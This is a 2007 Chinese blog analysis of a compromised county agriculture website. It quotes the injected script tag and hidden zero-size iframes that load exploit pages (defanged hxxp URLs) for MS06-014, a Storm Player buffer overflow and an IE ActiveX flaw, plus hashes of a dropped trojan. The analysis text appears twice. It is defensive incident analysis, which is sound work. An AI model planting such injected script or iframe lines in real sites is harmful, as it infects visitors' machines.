某县农业网被植入利用暴风影音2缓冲区溢出等漏洞的恶意代码
2007-09-25 14:53
615 查看
某县农业网被植入利用暴风影音2缓冲区溢出等漏洞的恶意代码
endurer 原创
2007-09-25 第1版
在 Maxthon 中打开该网站,Maxthon 会假死几分钟。检查网页源文件,发现尾部被加入代码:
/---
<script language=javascript src=hxxp://www.l*u**oyun**.com.cn/ly4/UploadAdpic/main.js></script>
---/
hxxp://www.l*u**oyun**.com.cn/ly4/UploadAdpic/main.js 功能是检测 cookies 变量 starballlll,如果不存在则 创建此变量,然后尝试利用 MS06-014: msadco.dll的漏洞
《Microsoft 安全公告 MS06-014
Microsoft Data Access Components (MDAC) 功能中的漏洞可能允许执行代码 (911562)
http://www.microsoft.com/china/technet/security/bulletin/ms06-014.mspx》
成功则输出代码:
/---
<iframe width=0 height=0 src=hxxp://www.st*a**rba*ll.com.cn/wm/014.htm></iframe>
---/
不成功则输出代码:
/---
<iframe width=0 height=0 src=hxxp://www.st*a**rba*ll.com.cn/wm/ying.htm></iframe>
<iframe width=0 height=0 src=hxxp://www.st*a**rba*ll.com.cn/wm/046.htm></iframe>
---/
hxxp://www.st*a**rba*ll.com.cn/wm/014.htm 下载 help.exe,保存为 c:/windows/rundll32.exe
文件说明符 : D:/test/help.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-9-25 12:50:49
修改时间 : 2007-9-25 12:50:39
访问时间 : 2007-9-25 12:52:5
大小 : 162816 字节 159.0 KB
MD5 : cf984011a6fd417bad2e9d69c3e9584e
HSA1: 448FEA693D6B30AD2BC8166911A6195BE31137B4
WARNING -> VIRUS -> W32@Sircam_mm
包含:WJD2006
hxxp://www.st*a**rba*ll.com.cn/wm/ying.htm 利用了暴风影音2 mps.dll组件多个缓冲区溢出漏洞执行代码。
hxxp://www.st*a**rba*ll.com.cn/wm/046.htm 利用了IE Internet.HHCtrl ActiveX对象的拒绝服务漏洞执行代码。
受IE Internet.HHCtrl ActiveX对象的拒绝服务漏洞影响的系统:
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
Internet Explorer在未初始化URL时调用Internet.HHCtrl.1 ActiveX对象的Click()方法触发空指针引用问题,可能导致IE崩溃。
参考:
IE Internet.HHCtrl ActiveX对象中拒绝服务漏洞
http://it.rising.com.cn/Channels/Safety/LatestHole/Hole_Windows/2006-07-25/1153791365d36644.shtml
以前也发现过利用此漏洞的东东:
ARP病毒加的网址利用雅虎通WebcamViewer控件溢出漏洞传播Worm.Delf.yqz
http://endurer.bokee.com/6321230.html
http://blog.csdn.net/Purpleendurer/archive/2007/06/11/1648346.aspx
endurer 原创
2007-09-25 第1版
在 Maxthon 中打开该网站,Maxthon 会假死几分钟。检查网页源文件,发现尾部被加入代码:
/---
<script language=javascript src=hxxp://www.l*u**oyun**.com.cn/ly4/UploadAdpic/main.js></script>
---/
hxxp://www.l*u**oyun**.com.cn/ly4/UploadAdpic/main.js 功能是检测 cookies 变量 starballlll,如果不存在则 创建此变量,然后尝试利用 MS06-014: msadco.dll的漏洞
《Microsoft 安全公告 MS06-014
Microsoft Data Access Components (MDAC) 功能中的漏洞可能允许执行代码 (911562)
http://www.microsoft.com/china/technet/security/bulletin/ms06-014.mspx》
成功则输出代码:
/---
<iframe width=0 height=0 src=hxxp://www.st*a**rba*ll.com.cn/wm/014.htm></iframe>
---/
不成功则输出代码:
/---
<iframe width=0 height=0 src=hxxp://www.st*a**rba*ll.com.cn/wm/ying.htm></iframe>
<iframe width=0 height=0 src=hxxp://www.st*a**rba*ll.com.cn/wm/046.htm></iframe>
---/
hxxp://www.st*a**rba*ll.com.cn/wm/014.htm 下载 help.exe,保存为 c:/windows/rundll32.exe
文件说明符 : D:/test/help.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-9-25 12:50:49
修改时间 : 2007-9-25 12:50:39
访问时间 : 2007-9-25 12:52:5
大小 : 162816 字节 159.0 KB
MD5 : cf984011a6fd417bad2e9d69c3e9584e
HSA1: 448FEA693D6B30AD2BC8166911A6195BE31137B4
WARNING -> VIRUS -> W32@Sircam_mm
包含:WJD2006
hxxp://www.st*a**rba*ll.com.cn/wm/ying.htm 利用了暴风影音2 mps.dll组件多个缓冲区溢出漏洞执行代码。
hxxp://www.st*a**rba*ll.com.cn/wm/046.htm 利用了IE Internet.HHCtrl ActiveX对象的拒绝服务漏洞执行代码。
受IE Internet.HHCtrl ActiveX对象的拒绝服务漏洞影响的系统:
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
Internet Explorer在未初始化URL时调用Internet.HHCtrl.1 ActiveX对象的Click()方法触发空指针引用问题,可能导致IE崩溃。
参考:
IE Internet.HHCtrl ActiveX对象中拒绝服务漏洞
http://it.rising.com.cn/Channels/Safety/LatestHole/Hole_Windows/2006-07-25/1153791365d36644.shtml
以前也发现过利用此漏洞的东东:
ARP病毒加的网址利用雅虎通WebcamViewer控件溢出漏洞传播Worm.Delf.yqz
http://endurer.bokee.com/6321230.html
http://blog.csdn.net/Purpleendurer/archive/2007/06/11/1648346.aspx
相关文章推荐
- 某易论坛被植入利用ANI漏洞传播 Backdoor.Win32.Agent.ahj 的代码
- 某论坛新游试玩区被植入利用ANI漏洞传播 Trojan.Mnless.kip 的代码
- 某留学网站被植入利用 PPStream 堆栈漏洞的代码
- 游戏安全资讯精选 2018年第八期:3975款游戏被查处,游戏圈重击;Memcached被利用UDP反射攻击漏洞预警;VentureBeat称区块链或可定位和消除恶意可执行代码的安全问题
- 某家园论坛被植入利用ANI漏洞传播QQ盗号木马Trojan-PSW.Win32.QQPass.rj的代码
- Windows Live的@live.com域名注册漏洞 利用代码
- 反病毒攻防研究第002篇:利用缝隙实现代码的植入
- 如何处理网站被植入恶意的一些代码导致的被机房拦截提示
- htaccess文件解析漏洞和利用Tamper绕过防注入代码
- PHP 5.2.3 tidy扩展本地溢出漏洞利用代码
- Android漏洞——将Android恶意代码隐藏在图片中
- 怎样写远程缓冲区溢出漏洞利用程序
- Windows Live的@live.com域名注册漏洞 利用代码
- VMware Mac版本漏洞可任意执行恶意代码
- Android中利用ZipEntry漏洞实现免root写恶意文件到应用的沙盒中
- PHP168 V6.02 整站系统远程执行任意代码漏洞利用
- 利用缓冲区溢出进行漏洞攻击
- 良性代码,恶意利用:浅谈 Return-Oriented 攻击